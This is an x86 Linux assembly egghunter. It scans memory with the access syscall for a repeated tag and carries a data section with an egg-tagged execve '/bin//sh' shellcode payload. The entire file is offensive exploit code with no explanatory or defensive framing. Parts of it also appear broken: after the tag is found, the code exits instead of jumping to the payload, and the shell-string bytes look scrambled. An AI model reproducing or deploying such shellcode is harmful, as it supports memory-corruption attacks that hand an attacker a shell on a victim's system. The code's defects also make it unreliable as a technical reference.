global _start
section .text
_start:
	incPage:
	mov ebx, 0x09050505  ; token
	or edx, 0xfff
	incMemory:
	inc edx	
	pushad ; push all the general purpose registers on the stack	
	xor ebx,ebx
	lea ebx, [edx+4]
	mov eax, 33
	xor ecx,ecx
	int 0x80

	cmp al,0xf2 ; EFAULT
	popad
	jz  incPage ;move to next page
	
		
	cmp ebx, [edx]
	jnz incMemory 
	
	cmp ebx, [edx+4]
	jnz incMemory

	exit:
	mov al,1
	xor bl,bl
	int 0x80

	section .data
	message:db 0x05,0x05,0x05,0x09,0x05,0x05,0x05,0x09,0x68,0x6e,0x2f,0x73,0x68,0x68,0x2f,0x2f,0x62,0x69,0x89,0xe3,0x50,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80




